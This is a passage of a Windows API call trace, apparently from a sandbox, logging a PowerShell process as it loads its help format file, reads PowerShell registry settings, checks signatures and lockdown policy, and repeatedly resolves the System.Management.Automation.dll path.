	[0044.994] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\helpv3.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d8
	[0044.994] GetFileType (hFile=0x3d8) returned 0x1
	[0044.995] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cc60) returned 1
	[0044.995] GetFileType (hFile=0x3d8) returned 0x1
	[0044.995] WTGetSignatureInfo () returned 0x0
	[0045.012] CertDuplicateCertificateContext (pCertContext=0x1505fba7120) returned 0x1505fba7120
	[0045.012] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cd88 | out: phkResult=0x184b47cd88*=0x5ec) returned 0x0
	[0045.012] RegQueryValueExW (in: hKey=0x5ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47cdd8, lpData=0x0, lpcbData=0x184b47cdd0*=0x0 | out: lpType=0x184b47cdd8*=0x1, lpData=0x0, lpcbData=0x184b47cdd0*=0x56) returned 0x0
	[0045.012] RegQueryValueExW (in: hKey=0x5ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47cdd8, lpData=0x150476dd578, lpcbData=0x184b47cdd0*=0x56 | out: lpType=0x184b47cdd8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184b47cdd0*=0x56) returned 0x0
	[0045.013] RegCloseKey (hKey=0x5ec) returned 0x0
	[0045.013] CoTaskMemAlloc (cb=0x10) returned 0x1505fb06f10
	[0045.013] CoTaskMemAlloc (cb=0x50) returned 0x1505f464fe0
	[0045.013] WinVerifyTrust () returned 0x0
	[0045.021] CoTaskMemFree (pv=0x1505f464fe0) 
	[0045.021] CoTaskMemFree (pv=0x1505fb06f10) 
	[0045.021] CertFreeCertificateContext (pCertContext=0x1505fba7120) returned 1
	[0045.053] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b8970
	[0045.053] GetSystemDirectoryW (in: lpBuffer=0x1505f3b8970, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0045.053] CoTaskMemFree (pv=0x1505f3b8970) 
	[0045.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0045.053] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cfa0) returned 1
	[0045.054] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cf60) returned 1
	[0045.054] WldpGetLockdownPolicy () returned 0x0
	[0045.054] GetSystemInfo (in: lpSystemInfo=0x184b47d0e0 | out: lpSystemInfo=0x184b47d0e0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0045.055] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cfe8 | out: phkResult=0x184b47cfe8*=0x3d8) returned 0x0
	[0045.055] RegQueryValueExW (in: hKey=0x3d8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47d038, lpData=0x0, lpcbData=0x184b47d030*=0x0 | out: lpType=0x184b47d038*=0x0, lpData=0x0, lpcbData=0x184b47d030*=0x0) returned 0x2
	[0045.055] RegCloseKey (hKey=0x3d8) returned 0x0
	[0045.055] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xb23e4e94, Data2=0x7f79, Data3=0x4c14, Data4=([0]=0xae, [1]=0xdb, [2]=0xa3, [3]=0x19, [4]=0xcc, [5]=0x9a, [6]=0x6e, [7]=0xc0))) returned 0x0
	[0045.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.056] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x921ef55a, Data2=0x9464, Data3=0x4ce9, Data4=([0]=0x87, [1]=0xf0, [2]=0xf0, [3]=0x21, [4]=0x30, [5]=0x59, [6]=0x61, [7]=0xe))) returned 0x0
	[0045.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.058] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x7aee5961, Data2=0x4a5, Data3=0x48a2, Data4=([0]=0x90, [1]=0xb0, [2]=0xdf, [3]=0x83, [4]=0x11, [5]=0xc6, [6]=0x5a, [7]=0xf8))) returned 0x0
	[0045.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.062] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xe06dc4e0, Data2=0x44a6, Data3=0x49f0, Data4=([0]=0xba, [1]=0xb7, [2]=0x9e, [3]=0x19, [4]=0x47, [5]=0x4e, [6]=0xc5, [7]=0x93))) returned 0x0
	[0045.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.063] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xf1c38695, Data2=0xa5a0, Data3=0x4a91, Data4=([0]=0x89, [1]=0xad, [2]=0x19, [3]=0xb1, [4]=0x79, [5]=0x49, [6]=0x18, [7]=0x1e))) returned 0x0
	[0045.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
